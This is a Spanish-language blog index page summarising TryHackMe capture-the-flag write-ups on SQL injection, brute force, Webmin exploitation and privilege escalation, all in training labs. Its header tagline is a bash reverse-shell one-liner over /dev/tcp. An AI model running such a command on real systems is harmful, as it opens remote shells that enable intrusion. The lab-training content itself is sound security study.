sckull - blog
bash -i >& /dev/tcp/localhost/1337 0>&1
TryHackMe - Overpass
· ✍️ sckull
cron
Overpass es una maquina de TryHackMe, es una serie de maquinas las cuales envuelven diferentes retos, en esta se presentan retos web y analisis de codigo para obtener acceso. Escalamos privilegios con informacion presentada en Crontab.
TryHackMe - Overpass
TryHackMe - Source
· ✍️ sckull
metasploit
Source es una maquina de TryHackMe donde encontramos Webmin por donde obtuvimos acceso utilizando un exploit de Metasploit.
TryHackMe - Source
TryHackMe - KoTH Food CTF
· ✍️ sckull
KoTH Food CTF es una maquina de TryHackMe parte de las maquinas de King of the Hill se presentan algunas formas para obtener acceso y escalar privilegios.
TryHackMe - KoTH Food CTF
TryHackMe - KoTH Hackers
· ✍️ sckull
KoTH Hackers es una maquina de TryHackMe parte de las maquinas de King of the Hill se presentan algunas formas para obtener acceso y escalar privilegios.
TryHackMe - KoTH Hackers
TryHackMe - uopeasy
· ✍️ sckull
sqli sqlmap wordpress
uopeasy es una maquina de TryHackMe, encontramos una vulnerabilidad SQL Injection donde obtuvimos credenciales para acceder a WordPress que luego nos dio acceso a la maquina. Escalamos privilegios con contraseñas almacenadas.
TryHackMe - uopeasy
TryHackMe - BP: Networking
· ✍️ sckull
BP: Networking de TryHackMe es una serie de conceptos y ejercicios sobre redes.
TryHackMe - BP: Networking
TryHackMe - Year of the Rabbit
· ✍️ sckull
ftp brainfuck vim sudo privesc
Year of the Rabbit es una maquina de TryHackMe, la maquina nos proporciona un wordlist que encontramos en una imagen y utilizamos en FTP para realizar un ataque de fuerza bruta con Hydra, tras acceder encontramos un pequeño que nos proporciono credenciales para acceder por SSH. Cambiamos de usuario con contraseñas almacenadas. Escalamos privilegios con una vulnerabilidad en Sudo y con Vi.
TryHackMe - Year of the Rabbit
TryHackMe - Break Out The Cage
· ✍️ sckull
ftp steganography vigenere
Break Out The Cage es una maquina de TryHackMe, presenta retos para obtener credenciales y acceso a la maquina, para el movimiento lateral analizamos un script y modificamos un archivo dependiente. Un reto nos permitió obtener la contraseña del usuario root.
TryHackMe - Break Out The Cage